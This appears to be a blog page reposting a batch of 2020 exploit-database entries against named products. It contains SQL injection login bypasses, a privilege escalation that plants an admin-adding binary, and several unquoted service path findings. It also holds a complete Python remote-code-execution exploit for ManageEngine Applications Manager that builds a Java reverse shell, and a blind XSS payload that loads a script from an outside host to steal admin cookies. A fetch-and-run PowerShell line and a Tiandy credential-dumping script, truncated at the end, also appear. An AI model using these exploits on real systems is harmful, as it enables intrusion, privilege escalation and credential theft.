# Exploit Title: Daily Tracker System 1.0 - Authentication Bypass
# Exploit Author: Adeeb Shah (@hyd3sec) & Bobby Cooke (boku)
# CVE ID: CVE-2020-24193
# Date: September 2, 2020
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/download-code?nid=14372&title=Daily+Tracker+System+in+PHP%2FMySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Vulnerable Source Code
if(isset($_POST['login']))
{
$email=$_POST['email'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"select ID from tbluser where Email='$email' && Password='$password ' ");
$ret=mysqli_fetch_array($query);
if($ret>0){
$_SESSION['detsuid']=$ret['ID'];
header('location:dashboard.php');
}
else{
$msg="Invalid Details.";
}
}
?>
# Malicious POST Request to https://TARGET/dets/index.php HTTP/1.1
POST /dets/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.65.130/dets/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
DNT: 1
Connection: close
Cookie: PHPSESSID=j3j54s5keclr8ol2ou4f9b518s
Upgrade-Insecure-Requests: 1
email='+or+1%3d1+--+hyd3sec&password=badPass&login=login
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151916
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: BloodX CMS 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-09-02
# Exploit Author: BKpatron
# Vendor Homepage: https://github.com/diveshlunker/BloodX
# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/BloodX-master/login.php
POST /BloodX-master/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Referer: http:/localhost/BloodX-master/login.php
Cookie: PHPSESSID=97vbf440gvh0fep3iuqusaqht
Connection: keep-alive
Upgrade-Insecure-Requests: 1
email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
# Exploit Title: BarracudaDrive v6.5 - Insecure Folder Permissions
# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
# CVE ID: N/A
# Date: 2020-09-01
# Vendor Homepage: https://barracudaserver.com/
# Software Link: https://download.cnet.com/BarracudaDrive/3001-18506_4-10723210.html
# Version: v6.5
# Tested On: Windows 10 Pro
# CVSS Base Score: 8.8 | Impact Subscore: 6.0 | Exploitability Subscore: 2.0
# CVSS Vector: AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
# CWE-276: Incorrect Default Permissions
# CWE-732: Incorrect Permission Assignment for Critical Resource
# Vulnerability Description:
# Insecure Service File Permissions in bd service in Real Time Logics BarracudaDrive v6.5
# allows local low-privilege attacker to escalate privileges to admin via replacing the bd.exe
# file and restarting the computer where the malicious code will be executed as 'LocalSystem'
# on the next startup.
## Insecure Folder Permission
C:\>cacls C:\bd
C:\bd BUILTIN\Administrators:(OI)(CI)(ID)F
NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
## Insecure File/Service Permission
C:\>cacls C:\bd\bd.exe
C:\bd\bd.exe BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
C:\>sc qc bd
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bd
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\bd\bd.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BarracudaDrive ( bd ) service
DEPENDENCIES : Tcpip
SERVICE_START_NAME : LocalSystem
## Local Privilege Escalation Proof of Concept
#0. Download & install
#1. Create low privileged user & change to the user
## As admin
C:\>net user lowpriv Password123! /add
C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full"
User name lowpriv
Local Group Memberships *Users
Global Group memberships *None
#2. Move the Service EXE to a new name
C:\bd>whoami
desktop\lowpriv
C:\bd>move bd.exe bd.service.exe
1 file(s) moved.
#3. Create malicious binary on kali linux
## Add Admin User C Code
kali# cat addAdmin.c
int main(void){
system("net user boku mypassword /add");
system("net localgroup Administrators boku /add");
WinExec("C:\\bd\\bd.service.exe",0);
return 0;
}
## Compile Code
kali# i686-w64-mingw32-gcc addAdmin.c -l ws2_32 -o bd.exe
#4. Transfer created 'bd.exe' to the Windows Host
#5. Move the created 'bd.exe' binary to the 'C:\bd\' Folder
C:\bd>move C:\Users\lowpriv\Downloads\bd.exe .
#6. Check that exploit admin user doesn't exit
C:\bd>net user boku
The user name could not be found
#6. Reboot the Computer
C:\bd>shutdown /r
#7. Login & look at that new Admin
C:\Users\lowpriv>net user boku | findstr /i "Membership Name" | findstr /v "Full"
User name boku
Local Group Memberships *Administrators *Users
Global Group memberships *None
# Exploit Title: Nord VPN-6.31.13.0 - 'nordvpn-service' Unquoted Service Path
# Discovery Date: 2020-09-03
# Discovery by: chipo
# Vendor Homepage: https://nordvpn.com
# Software Link : https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
# Tested Version: 6.31.13.0
# Tested on OS: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# Find the discover Unquoted Service Path Vulnerability:
C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ovpnconnect" | findstr /i /v """
nordvpn-service nordvpn-service C:\Program Files\NordVPN\nordvpn-service.exe
# Service info:
C:\>sc qc servicio
[SC] QueryServiceConfig SUCCESS
NOMBRE_SERVICIO: nordvpn-service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\NordVPN\nordvpn-service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : nordvpn-service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.
# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041
PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks
ServiceName : ShareMouse Service
Path : C:\Program Files (x86)\ShareMouse\smService.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>
PS > wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop DisplayName PathName StartName
TRUE ShareMouse Service C:\Program Files (x86)\ShareMouse\smService.exe LocalSystem
#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
#!/usr/bin/python3
# Exploit Title: ManageEngine Applications Manager 14700 - Remote Code Execution (Authenticated)
# Google Dork: None
# Date: 2020-09-04
# Exploit Author: Hodorsec
# Vendor Homepage: https://manageengine.co.uk
# Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
# Software Link: http://archives.manageengine.com/applications_manager/14720/
# Version: Until version 14720
# Tested on: version 12900 and version 14700
# CVE : CVE-2020-14008
# Summary:
# POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers
# Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor
# When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method
# Vulnerable code:
# Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
# 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
# 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader();
# 131 /* */ try {
# 132 /* 132 */ boolean setcredentials = false;
# 133 /* 133 */ String url = "t3://" + hostname + ":" + portString;
# 134 /* 134 */ JarLoader jarLoader = null;
# 135 /* */
# ....<SNIP>....
# 143 /* */ }
# 144 /* 144 */ else if (version == 8)
# 145 /* */ {
# 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
# 147 /* */ {
# 148 /* */
# 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
# 150 /* */
# ....<SNIP>....
# 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader);
# 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
# 172 /* 172 */ Object env = cls.newInstance();
# Example call for MAM version 12900:
# $ python3 poc_mam_weblogic_upload_and_exec_jar.py https://192.168.252.12:8443 admin admin weblogic.jar
# [*] Visiting page to retrieve initial cookies...
# [*] Retrieving admin cookie...
# [*] Getting base directory of ManageEngine...
# [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12
# [*] Creating JAR file...
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# added manifest
# adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
# [*] Uploading JAR file...
# [*] Attempting to upload JAR directly to targeted Weblogic folder...
# [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
# [*] Running the Weblogic credentialtest which triggers the code in the JAR...
# [*] Check your shell...
# Function flow:
# 1. Get initial cookie
# 2. Get valid session cookie by logging in
# 3. Get base directory of installation
# 4. Generate a malicious JAR file
# 5. Attempt to directly upload JAR, if success, jump to 7
# 6. Create task with random ID to copy JAR file to expected Weblogic location
# 7. Execute task
# 8. Delete task for cleanup
# 9. Run the vulnerable credentialTest, using the malicious JAR
import requests
import urllib3
import shutil
import subprocess
import os
import sys
import random
import re
from lxml import html
# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy
# Disable cert warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Set timeout
timeout = 10
# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")
exit(0)
# Custom headers
def http_headers():
headers = {
'User-Agent': 'Mozilla',
}
return headers
def get_initial_cookie(url,headers):
print("[*] Visiting page to retrieve initial cookies...")
target = url + "/index.do"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
return r.cookies
def get_valid_cookie(url,headers,initial_cookies,usern,passw):
print("[*] Retrieving admin cookie...")
appl_cookie = "JSESSIONID_APM_9090"
post_data = {'clienttype':'html',
'webstart':'',
'j_username':usern,
'ScreenWidth':'1280',
'ScreenHeight':'709',
'username':usern,
'j_password':passw,
'submit':'Login'}
target = url + "/j_security_check"
r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False)
res = r.text
if "Server responded in " in res:
return r.cookies
else:
print("[!] No valid response from used session, exiting!\n")
exit(-1)
def get_base_dir(url,headers,valid_cookie):
print("[*] Getting base directory of ManageEngine...")
target = url + "/common/serverinfo.do"
params = {'service':'AppManager',
'reqForAdminLayout':'true'}
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
tree = html.fromstring(r.content)
pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
base_dir = pathname[0]
print("[*] Found base directory: " + base_dir)
return base_dir
def create_jar(command,jarname,revhost,revport):
print("[*] Creating JAR file...")
# Variables
classname = "Environment"
pkgname = "weblogic.jndi"
fullname = pkgname + "." + classname
manifest = "MANIFEST.MF"
# Directory variables
curdir = os.getcwd()
metainf_dir = "META-INF"
maindir = "weblogic"
subdir = maindir + "/jndi"
builddir = curdir + "/" + subdir
# Check if directory exist, else create directory
try:
if os.path.isdir(builddir):
pass
else:
os.makedirs(builddir)
except OSError:
print("[!] Error creating local directory \"" + builddir + "\", check permissions...")
exit(-1)
# Creating the text file using given parameters
javafile = '''package ''' + pkgname + ''';
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.util.concurrent.TimeUnit;
public class ''' + classname + ''' {
// This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
// Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance()
public void setProviderUrl(String string) throws Exception {
System.out.println("Hello from setProviderUrl()");
connect();
}
// Normal main() entry
public static void main(String args[]) throws Exception {
System.out.println("Hello from main()");
// Added delay to notice being called from main()
TimeUnit.SECONDS.sleep(10);
connect();
}
// Where the magic happens
public static void connect() throws Exception {
String host = "''' + revhost + '''";
int port = ''' + str(revport) + ''';
String[] cmd = {"''' + command + '''"};
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {
while(pi.available()>0)
so.write(pi.read());
while(pe.available()>0)
so.write(pe.read());
while(si.available()>0)
po.write(si.read());
so.flush();
po.flush();
try {
p.exitValue();
break;
}
catch (Exception e){
}
};
p.destroy();
s.close();
}
}'''
# Output file to desired directory
os.chdir(builddir)
print(javafile,file=open(classname + ".java","w"))
# Go to previous directory to create JAR file
os.chdir(curdir)
# Create the compiled .class file
cmdCompile = "javac --release 7 " + subdir + "/*.java"
process = subprocess.call(cmdCompile,shell=True)
# Creating Manifest file
try:
if os.path.isdir(metainf_dir):
pass
else:
os.makedirs(metainf_dir)
except OSError:
print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...")
exit(-1)
print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w"))
# Create JAR file
cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class"
process = subprocess.call(cmdJar,shell=True)
# Cleanup directories
try:
shutil.rmtree(metainf_dir)
shutil.rmtree(maindir)
except:
print("[!] Error while cleaning up directories.")
return True
def upload_jar(url,headers,valid_cookie,jarname,rel_path):
print("[*] Uploading JAR file...")
target = url + "/Upload.do"
path_normal = './'
path_trav = rel_path
jar = {'theFile':(jarname,open(jarname, 'rb'))}
print("[*] Attempting to upload JAR directly to targeted Weblogic folder...")
post_data = {'uploadDir':path_trav}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
res = r_upload.text
if "successfully uploaded" not in res:
print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...")
post_data = {'uploadDir':path_normal}
jar = {'theFile':(jarname,open(jarname, 'rb'))}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
return "normal_path"
else:
print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!")
return "trav_path"
def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir):
print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...")
valid_resp = "Execute Program succesfully created."
target = url + "/adminAction.do"
post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null',
'method':'createExecProgAction',
'id':'0',
'displayname':action_name,
'serversite':'local',
'choosehost':'-2',
'prompt':'$',
'command':'move weblogic.jar ' + rel_path,
'execProgExecDir':work_dir,
'abortafter':'10',
'cancel':'false'}
r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
found_id = ""
if action_name in res:
tree = html.fromstring(r.content)
actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick')
actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()')
i = 0
for name in actionnames:
for url in actionurls:
if action_name in name:
found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1)
print("[*] Found actionname: " + action_name + " with found actionid " + found_id)
break
i+=1
return found_id
else:
print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.")
exit(-1)
def exec_task(url,headers,valid_cookie,found_id):
print("[*] Executing created task with id: " + found_id + " to copy JAR...")
valid_resp = "has been successfully executed"
target = url + "/common/executeScript.do"
params = {'method':'testAction',
'actionID':found_id,
'haid':'null'}
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
if valid_resp in res:
print("[*] Task " + found_id + " has been executed successfully")
else:
print("[!] Task not executed. Check requests, exiting...")
exit(-1)
return
def del_task(url,headers,valid_cookie,found_id):
print("[*] Deleting created task as JAR has been copied...")
target = url + "/adminAction.do"
params = {'method':'deleteProgExecAction'}
post_data = {'haid':'null',
'headercheckbox':'on',
'progcheckbox':found_id}
r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
def run_credtest(url,headers,valid_cookie):
print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...")
target = url + "/testCredential.do"
post_data = {'method':'testCredentialForConfMonitors',
'serializedData':'url=/jsp/newConfType.jsp',
'searchOptionValue':'',
'query':'',
'addtoha':'null',
'resourceid':'',
'montype':'WEBLOGIC:7001',
'isAgentEnabled':'NO',
'resourcename':'null',
'isAgentAssociated':'false',
'hideFieldsForIT360':'null',
'childNodesForWDM':'[]',
'csrfParam':'',
'type':'WEBLOGIC:7001',
'displayname':'test',
'host':'localhost',
'netmask':'255.255.255.0',
'resolveDNS':'False',
'port':'7001',
'CredentialDetails':'nocm',
'cmValue':'-1',
'version':'WLS_8_1',
'sslenabled':'False',
'username':'test',
'password':'test',
'pollinterval':'5',
'groupname':''}
print("[*] Check your shell...")
requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,verify=False)
return
# Main
def main(argv):
if len(sys.argv) == 6:
url = sys.argv[1]
usern = sys.argv[2]
passw = sys.argv[3]
revhost = sys.argv[4]
revport = sys.argv[5]
else:
print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>")
print("[*] Example: " + sys.argv[0] + " https://192.168.252.12:8443 admin admin 192.168.252.14 6666\n")
exit(0)
# Do stuff
try:
# Set HTTP headers
headers = http_headers()
# Relative path to copy the malicious JAR file
rel_path = "classes/weblogic/version8/"
# Generate a random ID to use for the task name and task tracking
random_id = str(random.randrange(0000,9999))
# Action_name used for displaying actions in overview
action_name = "move_weblogic_jar" + random_id
# Working dir to append to base dir
base_append = "\\working\\"
# Name for JAR file to use
jarname = "weblogic.jar"
# Command shell to use
cmd = "cmd.exe"
# Execute functions
initial_cookies = get_initial_cookie(url,headers)
valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw)
work_dir = get_base_dir(url,headers,valid_cookie) + base_append
create_jar(cmd,jarname,revhost,revport)
status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)
# Check if JAR can be uploaded via Directory Traversal
# If so, no need to add and exec actions; just run the credentialtest directly
if status_jar == "trav_path":
run_credtest(url,headers,valid_cookie)
# Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest
elif status_jar == "normal_path":
found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir)
exec_task(url,headers,valid_cookie,found_id)
del_task(url,headers,valid_cookie,found_id)
run_credtest(url,headers,valid_cookie)
except requests.exceptions.Timeout:
print("[!] Timeout error\n")
exit(-1)
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
exit(-1)
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
exit(-1)
except requests.exceptions.RequestException as e:
print("[!] " + e)
exit(-1)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + e.code + "\n")
exit(-1)
except KeyboardInterrupt:
keyboard_interrupt()
# If we were called as a program, go execute the main function.
if __name__ == "__main__":
main(sys.argv[1:])
# Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting
# Date: 2020-09-06
# Exploit Author: Mufaddal Masalawala
# Vendor Homepage: https://berrnd.de/
# Software Link: https://github.com/grocy/grocy
# Version: 2.7.1
# Tested on: Kali Linux 2020.3
# Proof Of Concept:
grocy household management solution v2.7.1, allows stored XSS and HTML
Injection, via Create Shopping List module, that is rendered upon
deletiing that Shopping List.
To exploit this vulnerability:
1. Login to the application
2. Go to 'Shooping List' module
3. Click on 'New Shopping List' module
4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name'
input field.
5. Click Save
6. Click 'Delete Shopping List'
*#REQUEST -->*
POST /api/objects/shopping_lists HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/shoppinglist/new
Content-type: application/json
Content-Length: 38
Connection: close
Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd
{"name":"<marquee onstart=alert(1)> "}
*#RESPONSE -->*
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Sun, 06 Sep 2020 12:53:13 GMT
Content-Type: application/json
Connection: close
X-Powered-By: PHP/7.3.21
Content-Length: 26
{"created_object_id":"21"}
Regards,
Mufaddal M
# Exploit Title: Cabot 0.11.12 - Persistent Cross-Site Scripting
# Date: 2020-09-06
# Exploit Author: Abhiram V
# Vendor Homepage: https://cabotapp.com/
# Software Link: https://github.com/arachnys/cabot
# Version: 0.11.12
# Tested on: Ubuntu Linux
############################################################################
Introduction
Cabot is a free, open-source, self-hosted infrastructure monitoring
platform
that provides some of the best features of PagerDuty, Server Density,
Pingdom
and Nagios without their cost and complexity.It provides a web interface
that allows
us to monitor services and send telephone, sms or hipchat/email alerts to
your
on-duty team if those services start misbehaving or go down .
############################################################################
XSS details: Blind XSS
############################################################################
Executing Blind XSS in New Instances leads to admin account takeover
URL
http://127.0.0.1:5000/instance/create/
PAYLOAD
"><script src=https://anonart.xss.ht></script>
*payload from xsshunter.com platform for finding blind xss*
PARAMETER
Address column
EXPLOITATION
Create a user account under django administrator account and login as user
to perform the attack
Create a new instance and save the instances, Navigate to Services.
Create a new Service from then input a Name and Url (for POC i used
BlindXSS in both columns).
Then append the admin account in Users to notify column and use status
check and instances then save.
Now the admin account gets a notification when the admin runs the check
Blind XSS executes in background.
when login to xsshunter.com we can see the screenshots cookies and all
details of admin account
IMPACT
Stored XSS can be executed from any accounts and triggered in any accounts
including django administration
unknowingly by the victim (here it is admin) and compromise the accounts.
Tested in both xsshunter.com and blindf.com
Attacker can also use stored xss payloads here.
############################################################################
# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10
# Find the Unquoted Service Path Vulnerability:
C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto"
| findstr /i /v "c:\windows\\" | findstr /i /v """
Input Director Service InputDirector C:\Program Files
(x86)\InputDirector\IDWinService.exe Auto
# Service info:
C:\sc qc IDWinService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: InputDirector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Input
Director\IDWinService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Input Director Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit:
A successful attempt to exploit this vulnerability could allow executing
code during startup or reboot with the elevated privileges.
# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A
# Requires Python 3 and PyCrypto
# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research
import sys
import hashlib
import base64
import socket
import struct
from Crypto.Cipher import DES
def main():
if len(sys.argv) != 2:
print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
exit(1)
host = sys.argv[1]
conn = Channel(host)
conn.connect()
crypt_key = conn.get_crypt_key(65536)
attempts = 2
tried_to_set_mail = False
ok = False
while attempts > 0:
attempts -= 1
code = get_psw_code(conn)
if code == False:
# psw not supported
break
elif code == None:
if not tried_to_set_mail:
print("No PSW data found, we'll try to set it...", file=sys.stderr)
tried_to_set_mail = True
if try_set_mail(conn, 'a@a.a'):
code = get_psw_code(conn)
if code == None:
print("couldn't set mail", file=sys.stderr)
break
rcode, password = recover_with_code(conn, code, crypt_key)
if rcode == 5:
print('The device is locked, try again later.', file=sys.stderr)
break
if rcode == 0:
print('Admin', password)
ok = True
break
if tried_to_set_mail:
try_set_mail(conn, '')
if not code:
print("PSW is not supported, trying default credentials...", file=sys.stderr)
credentials = recover_with_default(conn, crypt_key)
if credentials:
user, pw = credentials
print(user, pw)
ok = True
if not ok:
print('Recovery failed', file=sys.stderr)
exit(1)
def try_set_mail(conn, target):
conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
resp = conn.recv_msg()
return resp[4:7] == ['RESERVEPHONE', '2', '1']
def get_psw_code(conn):
conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
resp = conn.recv_msg()
if resp[4] != 'FINDPSW':
return False
psw_reg = psw_data = None
if len(resp) > 7:
psw_reg = resp[6]
psw_data = resp[7]
if not psw_data:
return None
psw_type = int(resp[5])
if psw_type not in (1, 2, 3):
raise Exception('unsupported psw type: '+str(psw_type))
if psw_type == 3:
psw_data = psw_data.split('"')[3]
if psw_type == 1:
psw_data = psw_data.split(':')[1]
psw_key = psw_reg[:0x1f]
elif psw_type in (2, 3):
psw_key = psw_reg[:4].lower()
psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
code = hashlib.md5(psw_code).hexdigest()[24:]
return code
def recover_with_code(conn, code, crypt_key):
conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
resp = conn.recv_msg()
rcode = int(resp[6])
if rcode == 0:
return rcode, decode(resp[8].encode(), crypt_key).decode()
return rcode, None
def recover_with_default(conn, crypt_key):
res = conn.login_with_key(b'Default', b'Default', crypt_key)
if not res:
return False
while True:
msg = conn.recv_msg()
if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()
###
### lib/des.py
###
def reverse_bits(data):
return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])
def pad(data):
if len(data) % 8:
padlen = 8 - (len(data) % 8)
data = data + b'\x00' * (padlen-1) + bytes([padlen])
return data
def unpad(data):
padlen = data[-1]
if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
data = data[:-padlen]
return data
def encrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))
def decrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))
def encode(data, key):
return base64.b64encode(encrypt(data, key))
def decode(data, key):
return decrypt(base64.b64decode(data), key)
###
### lib/binproto.py
###
def recvall(s, l):
buf = b''
while len(buf) < l:
nbuf = s.recv(l - len(buf))
if not nbuf:
break
buf += nbuf
